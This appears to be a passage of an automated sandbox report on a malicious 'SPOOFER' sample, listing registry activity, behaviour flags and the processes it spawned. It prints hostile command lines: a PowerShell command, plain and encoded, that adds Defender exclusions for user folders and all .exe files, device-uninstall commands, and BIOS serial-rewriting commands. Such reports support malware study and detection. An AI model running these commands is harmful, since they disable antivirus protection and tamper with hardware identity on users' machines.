| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\system32\cmd.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceType | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\System32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LocationInformation | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Control | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\Conhost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGUID | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\system32\conhost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service | C:\Windows\system32\cmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80497100-8c73-48b9-aad9-ce387e19c56e}\0006 | C:\Windows\System32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17975HP-TRGT32468AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317985HP-TRGT31945DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717985HP-TRGT31945MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617985HP-TRGT31945FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417985HP-TRGT31945FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517985HP-TRGT31945SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817985HP-TRGT31945SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217985HP-TRGT31945RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518001HP-TRGT20151SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318005HP-TRGT30900DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718005HP-TRGT30900MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618005HP-TRGT30900FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418001HP-TRGT20151FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
